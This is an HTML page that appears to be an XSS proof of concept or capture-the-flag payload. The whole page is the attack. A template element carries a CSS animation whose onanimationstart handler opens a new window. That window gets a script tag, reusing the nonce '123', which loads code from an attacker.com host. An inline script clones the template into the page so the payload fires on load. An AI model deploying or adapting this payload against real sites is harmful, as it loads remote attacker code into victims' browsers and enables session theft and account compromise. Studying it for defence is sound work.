<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
<template id=GGGGGnIepMGGGGG><style>@keyframes GGGGnIepMGGGG{}</style><xss style=animation-name:GGGGnIepMGGGG onanimationstart="w=window.open('about:blank'); w.document.write('<script src=https://attacker.com/static/static.js nonce=123><\/script>');"></xss></template><script nonce="123">document.body.appendChild(GGGGGnIepMGGGGG.content.cloneNode(true));</script>
</body>
</html>
